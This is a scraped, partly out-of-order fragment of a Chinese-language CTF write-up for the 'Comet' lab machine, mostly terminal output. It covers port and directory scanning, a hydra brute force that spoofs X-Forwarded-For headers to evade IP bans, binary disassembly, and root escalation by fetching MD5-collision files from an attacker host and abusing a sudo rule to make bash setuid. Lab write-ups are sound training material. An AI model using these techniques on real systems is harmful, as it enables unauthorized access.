]\ufffd\ufffd\ufffd\ufffd}\u059e"\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdJ\ufffd\u0238\ufffd\ufffd:\n i]\ufffd@|Aw\ufffd\ufffd\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ head msg2.bin \nHMV\nJ\ufffd\u0238\ufffd\ufffd:\ufffdx\ufffd\ufffd\u0135\ufffd~\ufffdy\ufffd?-\ufffdx>)*\ufffd\ufffd\ufffd \ufffd\ufffd\u00f7\ufffdCY\ufffd!hWK\ufffd\ufffd\u949c\u0716\ufffd\ufffd\ufffd\ufffd\\\ufffd\ufffd\ufffd\ufffdw\ufffd\ufffd\/l_\ufffd\ufffd\ufffd\u025b\ufffd!\ufffd1Sv!\ufffdW\ufffd\ufffd ]\ufffd\ufffd\ufffd\ufffd}\u059e"\ufffd\ufffd\ufffd\ufffd\ufffd\n i]\ufffd@\ufffdAw\ufffd\ufffd<\/code><\/pre>\n\u5c1d\u8bd5\u4e0a\u4f20\uff1a<\/p>\n
joe@comet:~$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\njoe@comet:~$ wget http:\/\/192.168.0.143:8888\/file1\n--2024-04-26 09:57:57-- http:\/\/192.168.0.143:8888\/file1\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 192 [application\/octet-stream]\nSaving to: \u2018file1\u2019\n\nfile1 100%[=========================================================================>] 192 --.-KB\/s in 0.01s \n\n2024-04-26 09:57:57 (16.4 KB\/s) - \u2018file1\u2019 saved [192\/192]\n\njoe@comet:~$ wget http:\/\/192.168.0.143:8888\/file2\n--2024-04-26 09:58:00-- http:\/\/192.168.0.143:8888\/file2\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 192 [application\/octet-stream]\nSaving to: \u2018file2\u2019\n\nfile2 100%[=========================================================================>] 192 --.-KB\/s in 0s \n\n2024-04-26 09:58:00 (36.7 MB\/s) - \u2018file2\u2019 saved [192\/192]\n\njoe@comet:~$ sudo -l\nMatching Defaults entries for joe on comet:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser joe may run the following commands on comet:\n (ALL : ALL) NOPASSWD: \/bin\/bash \/home\/joe\/coll\njoe@comet:~$ sudo \/bin\/bash \/home\/joe\/coll\njoe@comet:~$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\njoe@comet:~$ bash -p\nbash-5.1# cd \/root\nbash-5.1# ls -la\ntotal 24\ndrwx------ 3 root root 4096 Feb 21 2023 .\ndrwxr-xr-x 18 root root 4096 Feb 20 2023 ..\nlrwxrwxrwx 1 root root 9 Feb 6 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc\ndrwxr-xr-x 3 root root 4096 Feb 19 2023 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rwx------ 1 root root 33 Feb 6 2023 root.txt\nbash-5.1# cat root.txt \n052cf26a6e7e33790391c0d869e2e40c<\/code><\/pre>\n\u62ff\u4e0bflag\uff01\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Comet \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet] \u2514\u2500$ rusts […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-631","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/631","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=631"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/631\/revisions"}],"predecessor-version":[{"id":632,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/631\/revisions\/632"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=631"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=631"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=631"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ rustscan -a 192.168.0.179 -- -A \n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.179:22\nOpen 192.168.0.179:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-26 02:40 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nInitiating Ping Scan at 02:40\nScanning 192.168.0.179 [2 ports]\nCompleted Ping Scan at 02:40, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 02:40\nCompleted Parallel DNS resolution of 1 host. at 02:40, 0.10s elapsed\nDNS resolution of 1 IPs took 0.10s. Mode: Async [#: 3, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 02:40\nScanning comet (192.168.0.179) [2 ports]\nDiscovered open port 80\/tcp on 192.168.0.179\nDiscovered open port 22\/tcp on 192.168.0.179\nCompleted Connect Scan at 02:40, 0.00s elapsed (2 total ports)\nInitiating Service scan at 02:40\nScanning 2 services on comet (192.168.0.179)\nCompleted Service scan at 02:40, 6.08s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.0.179.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.36s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nNmap scan report for comet (192.168.0.179)\nHost is up, received syn-ack (0.00035s latency).\nScanned at 2024-04-26 02:40:31 EDT for 6s\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n| 3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV\/Sx5gw\/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX\/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+\/5R0D\/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx\/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9\/d6o2oWdMM=\n| 256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f\/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=\n| 256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS\n80\/tcp open http syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-title: CyberArray\n|_http-server-header: Apache\/2.4.54 (Debian)\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.18 seconds<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.179 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.179\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,bak,jpg,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html (Status: 403) [Size: 278]\n\/images (Status: 301) [Size: 315] [--> http:\/\/192.168.0.179\/images\/]\n\/index.html (Status: 200) [Size: 7097]\n\/.php (Status: 403) [Size: 278]\n\/contact.html (Status: 200) [Size: 5886]\n\/about.html (Status: 200) [Size: 7024]\n\/blog.html (Status: 200) [Size: 8242]\n\/support.html (Status: 200) [Size: 6329]\n\/login.php (Status: 200) [Size: 1443]\n\/ip.txt (Status: 200) [Size: 0]\n\/js (Status: 301) [Size: 311] [--> http:\/\/192.168.0.179\/js\/]\n\/.html (Status: 403) [Size: 278]\n\/.php (Status: 403) [Size: 278]\n\/server-status (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u53d1\u73b0\u7528\u6237owner<\/code>\u3002<\/p>\n<\/div><\/p>\n\u767b\u5f55\u754c\u9762<\/p>\n
\u654f\u611f\u76ee\u5f55<\/h3>\n
\u968f\u4fbf\u641e\u4e00\u4e2a\u8d26\u53f7\u5bc6\u7801\u8fdb\u884c\u767b\u5f55\uff0c\u4f46\u662f\u6709\u9632\u62a4\u63aa\u65bd\uff0c\u7b2c\u4e8c\u6b21\u5c31\u88abban\u6389\u4e86\u3002\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ curl http:\/\/192.168.0.179\/ip.txt\n192.168.0.152<\/code><\/pre>\n\u4f3c\u4e4e\u53ea\u5141\u8bb8\u8fd9\u4e2a\u7528\u6237\u8fdb\u884c\u767b\u5f55\uff1f<\/p>\n
\u7206\u7834\u5bc6\u7801<\/h3>\n
\u5c1d\u8bd5\u6293\u5305\uff1a<\/p>\n
POST \/login.php HTTP\/1.1\nHost: 192.168.0.179\nContent-Length: 32\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.0.179\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.0.179\/login.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nusername=admin&password=password<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528hydra<\/code>\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt 192.168.0.179 http-post-form "\/login.php:username=admin&password=^PASS^:H=X-Forwarded-For:192.168.0.152:F=Invalid"\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-26 02:58:24\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/192.168.0.179:80\/login.php:username=admin&password=^PASS^:H=X-Forwarded-For:192.168.0.152:F=Invalid\n[STATUS] 143.00 tries\/min, 143 tries in 00:01h, 14344266 to do in 1671:50h, 6 active\n[ERROR] all children were disabled due too many connection errors\n0 of 1 target completed, 0 valid password found\n[INFO] Writing restore file because 2 server scans could not be completed\n[ERROR] 1 target was disabled because of too many errors\n[ERROR] 1 targets did not complete\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-26 02:59:35<\/code><\/pre>\n\u989d\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt 192.168.0.179 http-post-form "\/login.php:username=admin&password=^PASS^:H=X-Originating-IP:192.168.0.152:F=Invalid" \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-26 03:01:45\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/192.168.0.179:80\/login.php:username=admin&password=^PASS^:H=X-Originating-IP:192.168.0.152:F=Invalid\n[STATUS] 4546.00 tries\/min, 4546 tries in 00:01h, 14339853 to do in 52:35h, 16 active\n[80][http-post-form] host: 192.168.0.179 login: admin password: solitario\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-26 03:03:05<\/code><\/pre>\n\u6210\u529f\uff01\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u4e0b\u8f7d\u65e5\u5fd7\u6587\u4ef6<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ for i in {1..51};do wget "http:\/\/192.168.0.179\/logFire\/firewall.log.$i"; done<\/code><\/pre>\n\u7136\u540e\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ cat * \n2023-02-19 16:35:30 172.16.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 172.16.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 192.168.0.1 Connection refused from 192.168.0.1\n2023-02-19 16:35:30 172.16.1.1 Connection refused from 192.168.0.1\n2023-02-19 16:35:30 192.168.2.1 Connection refused from 192.168.0.1\n2023-02-19 16:35:30 192.168.0.1 HTTP request to unauthorized URL from 10.0.0.1\n2023-02-19 16:35:30 172.16.0.1 Intrusion attempt from 192.168.0.1\n2023-02-19 16:35:30 10.1.1.1 Intrusion attempt from 192.168.0.1\n2023-02-19 16:35:30 10.0.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 192.168.1.1 Intrusion attempt from 192.168.0.1\n2023-02-19 16:35:30 10.0.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 192.168.2.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 192.168.0.1 Connection refused from 192.168.0.1\n2023-02-19 16:35:30 10.1.1.1 HTTP request to unauthorized URL from 10.0.0.1\n2023-02-19 16:35:30 192.168.1.1 Dropped packet from 10.0.0.1 to 192.168.0.1\n2023-02-19 16:35:30 172.16.0.1 Dropped packet from 10.0.0.1 to 192.168.0.1\n2023-02-19 16:35:30 172.16.0.1 Dropped packet from 10.0.0.1 to 192.168.0.1\n2023-02-19 16:35:30 192.168.2.1 Dropped packet from 10.0.0.1 to 192.168.0.1\n2023-02-19 16:35:30 10.0.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 10.0.0.1 Dropped packet from 10.0.0.1 to 192.168.0.1\n2023-02-19 16:35:30 192.168.0.1 HTTP request to unauthorized URL from 10.0.0.1\n2023-02-19 16:35:30 192.168.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 192.168.2.1 Dropped packet from 10.0.0.1 to 192.168.0.1<\/code><\/pre>\n\u53d1\u73b0\u5927\u91cf\u91cd\u590d\uff0c\u5c1d\u8bd5\u6392\u5e8f\uff0c\u5e76\u8f93\u51fa\u53ea\u51fa\u73b0\u4e00\u6b21\u7684\u884c\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ cat * | sort | uniq -u\n2023-02-19 16:35:31 192.168.1.10 | 192.168.1.50 | Allowed | Inbound connection | Joe<\/code><\/pre>\n\u8fd8\u6709\u4e00\u4e2a\u7279\u6b8a\u6587\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ wget http:\/\/192.168.0.179\/logFire\/firewall_update --2024-04-26 03:12:55-- http:\/\/192.168.0.179\/logFire\/firewall_update\nConnecting to 192.168.0.179:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 16248 (16K)\nSaving to: \u2018firewall_update\u2019\n\nfirewall_update 100%[=========================================================================>] 15.87K --.-KB\/s in 0s \n\n2024-04-26 03:12:55 (54.8 MB\/s) - \u2018firewall_update\u2019 saved [16248\/16248]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ file firewall_update \nfirewall_update: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=c8b4cde0414ff49d15473b0d47cde256c7931587, for GNU\/Linux 3.2.0, not stripped\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ pwn checksec firewall_update\n[*] '\/home\/kali\/temp\/comet\/firewall_update'\n Arch: amd64-64-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX enabled\n PIE: PIE enabled<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ radare2 firewall_update \nWarning: run r2 with -e bin.cache=true to fix relocations in disassembly\n[0x000010b0]> aaa\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Finding and parsing C++ vtables (avrr)\n[x] Type matching analysis for all functions (aaft)\n[x] Propagate noreturn information (aanr)\n[x] Use -AA or aaaa to perform additional experimental analysis.\n[0x000010b0]> pdf\n ;-- section..text:\n ;-- _start:\n ;-- rip:\n\u250c 34: entry0 (int64_t arg3);\n\u2502 ; arg int64_t arg3 @ rdx\n\u2502 0x000010b0 31ed xor ebp, ebp ; [15] -r-x section size 596 named .text\n\u2502 0x000010b2 4989d1 mov r9, rdx ; arg3\n\u2502 0x000010b5 5e pop rsi\n\u2502 0x000010b6 4889e2 mov rdx, rsp\n\u2502 0x000010b9 4883e4f0 and rsp, 0xfffffffffffffff0\n\u2502 0x000010bd 50 push rax\n\u2502 0x000010be 54 push rsp\n\u2502 0x000010bf 4531c0 xor r8d, r8d\n\u2502 0x000010c2 31c9 xor ecx, ecx\n\u2502 0x000010c4 488d3dce0000. lea rdi, [main] ; 0x1199\n\u2502 0x000010cb ff150f2f0000 call qword [reloc.__libc_start_main] ; [0x3fe0:8]=0\n\u2514 0x000010d1 f4 hlt\n[0x000010b0]> s main\n[0x00001199]> pdf\n ; DATA XREF from entry0 @ 0x10c4\n\u250c 363: int main (int argc, char **argv, char **envp);\n\u2502 ; var char *s2 @ rbp-0xf0\n\u2502 ; var char *s1 @ rbp-0xa0\n\u2502 ; var int64_t var_98h @ rbp-0x98\n\u2502 ; var int64_t var_90h @ rbp-0x90\n\u2502 ; var int64_t var_88h @ rbp-0x88\n\u2502 ; var int64_t var_80h @ rbp-0x80\n\u2502 ; var int64_t var_78h @ rbp-0x78\n\u2502 ; var int64_t var_70h @ rbp-0x70\n\u2502 ; var int64_t var_68h @ rbp-0x68\n\u2502 ; var int64_t var_60h @ rbp-0x60\n\u2502 ; var char *s @ rbp-0x50\n\u2502 ; var int64_t var_30h @ rbp-0x30\n\u2502 ; var signed int64_t var_4h @ rbp-0x4\n\u2502 0x00001199 55 push rbp\n\u2502 0x0000119a 4889e5 mov rbp, rsp\n\u2502 0x0000119d 4881ecf00000. sub rsp, 0xf0\n\u2502 0x000011a4 48b862383732. movabs rax, 0x3862613832373862 ; 'b8728ab8'\n\u2502 0x000011ae 48ba31613363. movabs rdx, 0x3139333363336131 ; '1a3c3391'\n\u2502 0x000011b8 48898560ffff. mov qword [s1], rax\n\u2502 0x000011bf 48899568ffff. mov qword [var_98h], rdx\n\u2502 0x000011c6 48b866356636. movabs rax, 0x3933663336663566 ; 'f5f63f39'\n\u2502 0x000011d0 48ba64613732. movabs rdx, 0x3938656532376164 ; 'da72ee89'\n\u2502 0x000011da 48898570ffff. mov qword [var_90h], rax\n\u2502 0x000011e1 48899578ffff. mov qword [var_88h], rdx\n\u2502 0x000011e8 48b866343366. movabs rax, 0x6639613966333466 ; 'f43f9a9f'\n\u2502 0x000011f2 48ba34323962. movabs rdx, 0x6663386362393234 ; '429bc8cf'\n\u2502 0x000011fc 48894580 mov qword [var_80h], rax\n\u2502 0x00001200 48895588 mov qword [var_78h], rdx\n\u2502 0x00001204 48b865383538. movabs rax, 0x3430386638353865 ; 'e858f804'\n\u2502 0x0000120e 48ba38656161. movabs rdx, 0x3162326461616538 ; '8eaad2b1'\n\u2502 0x00001218 48894590 mov qword [var_70h], rax\n\u2502 0x0000121c 48895598 mov qword [var_68h], rdx\n\u2502 0x00001220 c645a000 mov byte [var_60h], 0\n\u2502 0x00001224 488d05d90d00. lea rax, str.Enter_password:_ ; 0x2004 ; "Enter password: "\n\u2502 0x0000122b 4889c7 mov rdi, rax ; const char *format\n\u2502 0x0000122e b800000000 mov eax, 0\n\u2502 0x00001233 e8f8fdffff call sym.imp.printf ; int printf(const char *format)\n\u2502 0x00001238 488d45b0 lea rax, [s]\n\u2502 0x0000123c 4889c6 mov rsi, rax\n\u2502 0x0000123f 488d05cf0d00. lea rax, [0x00002015] ; "%s"\n\u2502 0x00001246 4889c7 mov rdi, rax ; const char *format\n\u2502 0x00001249 b800000000 mov eax, 0\n\u2502 0x0000124e e83dfeffff call sym.imp.__isoc99_scanf ; int scanf(const char *format)\n\u2502 0x00001253 488d45b0 lea rax, [s]\n\u2502 0x00001257 4889c7 mov rdi, rax ; const char *s\n\u2502 0x0000125a e801feffff call sym.imp.strlen ; size_t strlen(const char *s)\n\u2502 0x0000125f 4889c1 mov rcx, rax\n\u2502 0x00001262 488d55d0 lea rdx, [var_30h]\n\u2502 0x00001266 488d45b0 lea rax, [s]\n\u2502 0x0000126a 4889ce mov rsi, rcx\n\u2502 0x0000126d 4889c7 mov rdi, rax\n\u2502 0x00001270 e8dbfdffff call sym.imp.SHA256\n\u2502 0x00001275 c745fc000000. mov dword [var_4h], 0\n\u2502 \u250c\u2500< 0x0000127c eb3c jmp 0x12ba\n\u2502 \u2502 ; CODE XREF from main @ 0x12be\n\u2502 \u250c\u2500\u2500> 0x0000127e 8b45fc mov eax, dword [var_4h]\n\u2502 \u254e\u2502 0x00001281 4898 cdqe\n\u2502 \u254e\u2502 0x00001283 0fb64405d0 movzx eax, byte [rbp + rax - 0x30]\n\u2502 \u254e\u2502 0x00001288 0fb6c0 movzx eax, al\n\u2502 \u254e\u2502 0x0000128b 8b55fc mov edx, dword [var_4h]\n\u2502 \u254e\u2502 0x0000128e 01d2 add edx, edx\n\u2502 \u254e\u2502 0x00001290 488d8d10ffff. lea rcx, [s2]\n\u2502 \u254e\u2502 0x00001297 4863d2 movsxd rdx, edx\n\u2502 \u254e\u2502 0x0000129a 4801d1 add rcx, rdx\n\u2502 \u254e\u2502 0x0000129d 89c2 mov edx, eax ; ...\n\u2502 \u254e\u2502 0x0000129f 488d05720d00. lea rax, str._02x ; 0x2018 ; "%02x"\n\u2502 \u254e\u2502 0x000012a6 4889c6 mov rsi, rax ; const char *format\n\u2502 \u254e\u2502 0x000012a9 4889cf mov rdi, rcx ; char *s\n\u2502 \u254e\u2502 0x000012ac b800000000 mov eax, 0\n\u2502 \u254e\u2502 0x000012b1 e8bafdffff call sym.imp.sprintf ; int sprintf(char *s, const char *format, ...)\n\u2502 \u254e\u2502 0x000012b6 8345fc01 add dword [var_4h], 1\n\u2502 \u254e\u2502 ; CODE XREF from main @ 0x127c\n\u2502 \u254e\u2514\u2500> 0x000012ba 837dfc1f cmp dword [var_4h], 0x1f\n\u2502 \u2514\u2500\u2500< 0x000012be 7ebe jle 0x127e\n\u2502 0x000012c0 488d9510ffff. lea rdx, [s2]\n\u2502 0x000012c7 488d8560ffff. lea rax, [s1]\n\u2502 0x000012ce 4889d6 mov rsi, rdx ; const char *s2\n\u2502 0x000012d1 4889c7 mov rdi, rax ; const char *s1\n\u2502 0x000012d4 e8a7fdffff call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)\n\u2502 0x000012d9 85c0 test eax, eax\n\u2502 \u250c\u2500< 0x000012db 7511 jne 0x12ee\n\u2502 \u2502 0x000012dd 488d05390d00. lea rax, str.Firewall_successfully_updated ; 0x201d ; "Firewall successfully updated"\n\u2502 \u2502 0x000012e4 4889c7 mov rdi, rax ; const char *s\n\u2502 \u2502 0x000012e7 e854fdffff call sym.imp.puts ; int puts(const char *s)\n\u2502 \u250c\u2500\u2500< 0x000012ec eb0f jmp 0x12fd\n\u2502 \u2502\u2502 ; CODE XREF from main @ 0x12db\n\u2502 \u2502\u2514\u2500> 0x000012ee 488d05460d00. lea rax, str.Incorrect_password ; 0x203b ; "Incorrect password"\n\u2502 \u2502 0x000012f5 4889c7 mov rdi, rax ; const char *s\n\u2502 \u2502 0x000012f8 e843fdffff call sym.imp.puts ; int puts(const char *s)\n\u2502 \u2502 ; CODE XREF from main @ 0x12ec\n\u2502 \u2514\u2500\u2500> 0x000012fd b800000000 mov eax, 0\n\u2502 0x00001302 c9 leave\n\u2514 0x00001303 c3 